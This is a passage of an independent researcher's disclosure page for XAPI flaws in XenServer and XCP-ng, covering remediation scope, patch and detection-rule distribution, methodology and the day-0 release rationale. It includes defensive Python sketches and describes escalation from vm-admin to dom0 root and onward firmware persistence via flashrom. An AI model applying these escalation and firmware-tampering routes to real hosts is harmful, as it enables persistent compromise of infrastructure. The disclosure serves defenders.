- Any system that those VMs connected to, authenticated against, or served data to must be treated as potentially compromised (standard lateral-movement chain)

- Any backup that captured state from any of the above is in the same compromise category

- And the transitive closure of “attached to, exchanged credentials with, trusted metadata from” propagates outward from there

In plain terms: if you are in a regulated space and you have a Citrix XenServer or XCP-ng deployment, the conservative regulatory posture is to assume the confidentiality boundary has been breached and to rebuild the affected systems and anything downstream of them – not to patch them in place. There is no way to prove non-compromise for a 16-to-20-year exposure window on vulnerabilities of this severity. Deferring to your regulator’s guidance on breached-confidentiality remediation is appropriate; the researcher’s opinion is that the transitive-trust radius on this one is larger than most deployers will initially appreciate.

Responsibility. No party – the researcher, the vendor, or any deployer – can determine the extent of historical exploitation across a 16-to-20-year exposure window. That uncertainty is inherent to the exposure period and severity class. Downstream deployers who relied on the vendor’s product are not the source of these architectural failures. The researcher performed the review independently and is publishing the results so that the ecosystem can remediate.

One more layer that high-assurance deployers should think about: UEFI and baseboard firmware. BOC-1 gives a vm-admin full host filesystem read/write and therefore root equivalence on the hypervisor dom0. From dom0, an attacker can write to the SPI flash of the motherboard via standard tools (flashrom, vendor firmware-update utilities, or direct MMIO on systems where SPI write-protect is not enforced). UEFI firmware implants – LogoFAIL (Binarly, 2023), BlackLotus (2022), CVE-2024-7344 (2025), and the broader class of BIOS-persistent bootkits documented in public research over the last five years – survive disk reformat, OS reinstall, and often survive vendor firmware-flash attempts because the malicious payload re-writes itself during the flash cycle. For a server that has been running an XAPI-based hypervisor in production over the 16-to-20-year exposure window, the conservative assumption is that the hardware itself is potentially untrusted, not just the software stack it ran. Regulated-space remediation therefore may extend to physical decommissioning of affected chassis rather than firmware re-flash – and at minimum to independent verification of firmware integrity via hardware dumps and cross-comparison against vendor reference images, which is a capability most enterprises do not have in-house. If you cannot prove firmware integrity, you cannot prove the rebuilt VMs on that hardware are on a clean substrate. Your regulator’s guidance on hardware-level compromise scenarios is the correct reference.

9. Upstream patches (19 ready-to-merge)

Nineteen upstream patches have been authored against the XAPI codebase. The complete patch set is ~200 lines of OCaml – small enough to review in an afternoon, not an architectural rewrite. The patches address:

- Populating map_keys_roles across affected object types to enforce per-key RBAC on infrastructure-sensitive keys

- Closing the set_other_config bypass – the architectural limitation that allows whole-map replacement to skip per-key role checks

- Adding input validation on consumer-side code paths (backend_of_vbd, SM driver consumers, network config consumers)

- Security-level logging on suspicious map-key writes (replacing warning-level messages that were previously buried)

- Allow-list enforcement on selected high-risk keys
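One way to close a whole-map bypass is to diff the old and new maps and apply the per-key role check to every key that changed. The sketch below shows that idea in Python. It is not the researcher's OCaml patch, which is not public, and the role ordering, function names, and `key_roles` table are assumptions for illustration.

```python
# Simplified role ordering; real XAPI defines more roles than these three.
RANK = {"vm-admin": 1, "pool-operator": 2, "pool-admin": 3}


def changed_keys(old, new):
    """Keys that were added, removed, or given a different value."""
    return {k for k in old.keys() | new.keys() if old.get(k) != new.get(k)}


def checked_set_map(role, old, new, key_roles):
    """Whole-map replacement that still applies per-key role checks.

    key_roles maps a protected key to the minimum role allowed to change it.
    """
    for key in sorted(changed_keys(old, new)):
        required = key_roles.get(key)
        if required is not None and RANK[role] < RANK[required]:
            raise PermissionError(f"{role} may not change {key}")
    return dict(new)
```

Diffing rather than checking every key in the new map lets a low-privileged caller keep editing unprotected keys on an object that already carries protected ones, while still blocking removal of a protected key.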

All patches are written in OCaml against the current XAPI codebase and have been tested locally.

Patch distribution – private

The 19 patches are held privately by the researcher. They are not part of the general disclosure package and are not available on request.

Vates (XCP-ng maintainers): on 2026-04-23 the researcher sent a direct, conditional offer to Vates to transfer the patch set ahead of public disclosure, on one non-negotiable condition: the patches could not be actively delivered to Cloud Software Group (Citrix) through any pre-public channel, including any coordination framework that would obligate such sharing. The offer required written acknowledgment from Vates before any patches transferred. No response was received before the 2026-04-24 08:00 CEST public release. The patches therefore remain with the researcher; Vates is welcome to implement remediations from the public advisories at cna.moksha.dk like any other downstream consumer, and the offer remains open under the same conditions if Vates wishes to engage post-release. Vates is a victim of the upstream architectural failures, not an adversary of this disclosure.

Cloud Software Group (Citrix): did not receive a pre-release patch offer. See section 12 for the factors that produced that posture. Post-release, Citrix can request the patches through the same channel as any other consumer of public disclosure; availability is decided case-by-case on the same factors that apply to any requester.

Everyone else: the patches are not distributed. The public advisories at cna.moksha.dk describe the vulnerabilities in sufficient detail for skilled engineers to implement their own remediations. The complete patch set is approximately 200 lines of OCaml; the fix is not architecturally invasive, and any competent XAPI maintainer can reproduce it by populating the map_keys_roles annotations and adding consumer-side validation on the paths documented in the advisories.

10. IDS detection rules (42 across 5 categories)

A defender-side artifact: 42 detection rules covering exploitation traffic for teams that cannot patch quickly. Rules are organised by vendor category and designed to be implementable with existing vendor tooling.

Rule categories

| Category | Audience | What it detects |
|---|---|---|
| XAPI-level rules | Platform vendors (Vates, Citrix); operators of XAPI pools | Map-field write anomalies, add_to_other_config abuse, set_other_config RBAC bypass |
| Storage-level rules | Storage vendors (NetApp, Dell EMC, Pure, HPE, cloud storage) | Anomalous iSCSI / NFS / FC / SMB commands from XAPI-managed hosts; protocol injection signatures |
| Network-level rules | Networking vendors (Cisco, Arista, Juniper); OVS operators | OVS/SDN anomalies, HIMN manipulation traffic, VIF backend hijack indicators |
| Monitoring / backup rules | Backup vendors; monitoring integrators | Metadata sanitisation checkpoints; detection of poisoned metadata ingested from XAPI |
| Platform / host-level rules | Hypervisor operators | Host filesystem access patterns consistent with BOC-1 exploitation |
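To give a feel for what an XAPI-level rule might look like, here is a minimal Python sketch of a map-field write check. It is not one of the 42 rules, whose text is available on request as described below. The event dictionary shape (`object`, `field`, `keys`) and the function name are hypothetical; the watched keys and fields are limited to those named in this disclosure, and a real rule set would cover more.

```python
# Individual map keys named in this disclosure as security-relevant.
WATCHED_KEYS = {
    ("VBD", "other_config", "backend-local"),
    ("VM", "other_config", "is_system_domain"),
}

# Map fields named in this disclosure where any write deserves review.
WATCHED_FIELDS = {
    ("VDI", "sm_config"),
    ("SR", "sm_config"),
    ("PBD", "device_config"),
}


def flag_event(event):
    """Return a reason string for a suspicious (hypothetical) audit event, else None.

    `event` is assumed to carry the object type, the map field written, and the
    list of keys present in the write, whether it came from an add_to_* call
    (one key) or a set_* call (the whole replacement map).
    """
    obj, field = event["object"], event["field"]
    for key in event.get("keys", []):
        if (obj, field, key) in WATCHED_KEYS:
            return f"write to watched key {obj}.{field}:{key}"
    if (obj, field) in WATCHED_FIELDS:
        return f"write to watched field {obj}.{field}"
    return None
```

Checking the keys of a whole-map write the same way as a single-key write is deliberate: it keeps a set_other_config call from slipping past a rule that only watches add_to_other_config.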

Availability: anyone in the blast radius can have them. The full detection rule text, signal definitions, and implementation notes are available on request to anyone with operational responsibility for an affected system – hypervisor operators running XenServer or XCP-ng, storage vendors and operators whose arrays are downstream of XAPI-managed hosts, networking teams operating OVS or similar SDN plumbing on affected pools, monitoring and backup integrators whose systems ingest XAPI metadata, hosting providers with customer workloads on XAPI-based hypervisors, CSIRTs coordinating sectoral response, and affected enterprise deployers of any size. Detection rules are intended to be acted on immediately by people who need them, not gated behind vendor coordination. Email jakob@wolffhechel.dk with a one-line description of your operational position and you will receive the rules. No NDA, no bureaucracy; the patches stay private, the detection rules do not.

11. Methodology

The audit was source-code-driven. Every writable Map(String,String) field across XAPI was traced from the API entry point (add_to_other_config, set_other_config, equivalent methods on other map-typed fields) through the XAPI internal data model (datamodel.ml), into the consumer code paths in xenopsd, SM drivers, networkd, and the host management plane.

For every write-to-consumer path, the following questions were evaluated:

- Does a map_keys_roles entry exist for this key?
- If yes: is the role restriction meaningful given the consumer’s privilege level?
- If no: can vm-admin write this key via add_to_other_config and cause security-relevant consumer behaviour?
- Can set_other_config bypass whatever per-key RBAC exists?
- Is there input validation at the consumer?
- Is there security-level logging on suspicious values?
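The questions above map naturally onto one record per write-to-consumer path. The following Python sketch shows one way such a record and a simple triage function could look. The class, field, and function names are hypothetical and are not taken from the researcher's tooling.

```python
from dataclasses import dataclass


@dataclass
class PathReview:
    """Answers to the review questions for one write-to-consumer path."""
    key: str
    has_map_keys_roles_entry: bool
    role_restriction_meaningful: bool          # only relevant when an entry exists
    vm_admin_write_has_security_effect: bool   # only relevant when no entry exists
    set_call_bypasses_per_key_rbac: bool
    consumer_validates_input: bool
    consumer_logs_suspicious_values: bool


def open_issues(review):
    """List the answers that point at a weakness (illustrative triage only)."""
    issues = []
    if review.has_map_keys_roles_entry:
        if not review.role_restriction_meaningful:
            issues.append("role restriction not meaningful")
    elif review.vm_admin_write_has_security_effect:
        issues.append("vm-admin write has security-relevant effect")
    if review.set_call_bypasses_per_key_rbac:
        issues.append("set call bypasses per-key RBAC")
    if not review.consumer_validates_input:
        issues.append("no input validation at consumer")
    if not review.consumer_logs_suspicious_values:
        issues.append("no security logging on suspicious values")
    return issues
```

A path with an empty issue list is one where every question was answered favourably; anything else is a candidate for live testing.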

Every vulnerability identified was live-tested on production-grade hardware owned by the researcher. Proof-of-concept scripts exercise the exact API call sequence and capture evidence of the resulting consumer behaviour. 206 evidence logs are retained, timestamped, and available for CSIRT-scoped review.

The methodology is trivially reproducible by any party with access to the XAPI source. It does not require advanced tooling, fuzzing infrastructure, or reverse engineering.

12. Why Day-0 public release (no embargo)

Day-0 public disclosure is an unusual choice for research of this scope. The rationale is specific to this vendor.

Citrix does not operate a bug bounty for XenServer

XenServer is explicitly out of scope for Cloud Software Group’s bug bounty. Their HackerOne program covers Cloud/SaaS only. Their policy states: “coordinated disclosure reports do NOT qualify for bounty.” There is no formal channel through which Citrix accepts XenServer vulnerability reports in exchange for anything.

Public severity dispute: CVE-2024-8068/8069

CVE-2024-8068/8069 – unauthenticated RCE – was rated Medium (CVSS 5.1) by Citrix. watchTowr publicly critiqued the severity rating (covered by The Register and Dark Reading).

CitrixBleed class recurrence (2023 -> 2025)

CitrixBleed (CVE-2023-4966, 2023) and CitrixBleed 2 (CVE-2025-5777, 2025) are the same class of memory-safety vulnerability two years apart. CISA issued special guidance in 2023 on the first incident.

Citrix is their own CNA

They control CVE numbering and severity assignment for their own products.

The CVE pipeline is backlogged

CVE reservations were submitted to MITRE on 2026-04-09 (15 days before public release). No response. Follow-up filings to GCVE/CIRCL, ENISA, and DIVD on 2026-04-18 (6 days before public release) – no response. CERT/CC notified 2026-04-23 (ref [gen-55566]); ticket closed same day.

Asymmetric disclosure is proportionate

Every deployment of Citrix XenServer is exposed. In an era where attackers are supercharging exploit development with LLMs, holding 89 unpatched vulnerabilities behind a CVE-pipeline wait is not defensible. The asymmetric pre-release posture – a conditional patch offer to Vates (the open-source downstream, a fellow victim of the upstream architecture), no pre-release offer to Citrix – is the proportionate response under the factors documented above. Post-release, all parties are on the same footing.

13. CVE and notification status

| Party | Contacted | Status |
|---|---|---|
| MITRE (primary CVE) | 2026-04-09 (15 days before release) | No response. Chased 2026-04-23. |
| GCVE / CIRCL | 2026-04-18 | No response |
| ENISA | 2026-04-18 | No response |
| DIVD (Dutch Institute of Vulnerability Disclosure) | 2026-04-18 | No response |
| CERT/CC | 2026-04-23 (1 day before release) | Notification sent (ref [gen-55566]); acknowledged same day with generic “wait 2 weeks for vendor coordination” guidance, ticket closed on first response. Researcher proceeded as planned. |
| Vates (XCP-ng maintainers) | 2026-04-23 (conditional patch offer) | Contacted. No response received before release. Offer remains open post-release under same conditions. See section 9 above. |
| Cloud Software Group (Citrix) | Not contacted pre-release | Not contacted pre-release – see rationale in section 12 |

CVE IDs: no IDs assigned yet due to pipeline backlog. This page will be updated when CVE IDs are issued. If you are a CNA and wish to expedite assignment, contact jakob@wolffhechel.dk.

14. How to reach me

Email: jakob@wolffhechel.dk

Signal (preferred for sensitive material): +45 3170 7337

Phone / voice: +45 3170 7337

For sensitive correspondence (CSIRT coordination, journalist source protection, vendor engagement) Signal is preferred over email. No PGP – Signal handles the threat model more cleanly, without the key-management overhead that often leaves PGP unused in practice.

Availability summary:

Available to anyone in the blast radius (hypervisor operators, storage/networking/monitoring/backup teams, hosting providers, enterprise deployers, CSIRTs, security journalists – anyone with operational responsibility for an affected system or for reporting on it):

- Full per-vulnerability advisories – already public at cna.moksha.dk

- IDS detection rules (42 rules with full signal definitions) – email to request; sent immediately, no NDA

- Category-relevant impact analysis for downstream vendors (storage, networking, monitoring, backup)

Available on request to CSIRTs and accredited incident responders (national/sectoral CSIRTs with documented coordination standing):

- Proof-of-concept scripts (124 Python scripts on a shared poc_lib.py framework, covering all 89 findings)

- Evidence logs from live testing (206 logs) with timestamps and reproducibility

Not available – held privately by the researcher:

- Upstream patches (19 OCaml patches, ~200 lines total). See section 9 for the distribution policy.

Who gets what:

- Hypervisor operators (XenServer/XCP-ng): public advisories; IDS rules on request; apply the documented remediations in the advisories

- Storage / networking / monitoring / backup teams downstream of affected hosts: public advisories + category-relevant IDS rules on request + impact analysis

- CSIRTs (national, sectoral): the above plus PoCs + evidence logs on request

- Security journalists: public advisories + IDS rules on request + quotable verifications

- Vates (XCP-ng): received a pre-release patch offer 2026-04-23 (see section 9). No response before release; offer remains open post-release under the same conditions.

- Citrix / Cloud Software Group: the public page. No pre-release materials were offered. Post-release requests (patches, detection rules) are handled through the same channel as any other consumer of public disclosure and decided on the same factors that apply to any requester. Advisories are sufficient for Citrix to write their own remediations independently.

- Enterprise customers of affected products: public advisories + IDS rules on request. You do not need CSIRT intermediation for the detection rules; email directly.

15. Ethics statement

All testing was conducted on infrastructure owned and operated by the researcher. No unauthorized access to third-party systems occurred. No live production systems belonging to customers, vendors, or third parties were touched.

The research was not funded by any vendor, and the researcher has no competing commercial interests. The researcher operates as Moksha, a single-person consultancy in Copenhagen.

The asymmetric pre-release posture – Vates offered, Citrix not – is a deliberate choice documented in section 9 (mechanics) and section 12 (rationale). Post-release, any requester including Citrix can contact the researcher; availability is decided case-by-case.

If the disclosure posture described here is wrong, the argument against it should be made in public, on the merits. The researcher welcomes that argument in subsequent correspondence.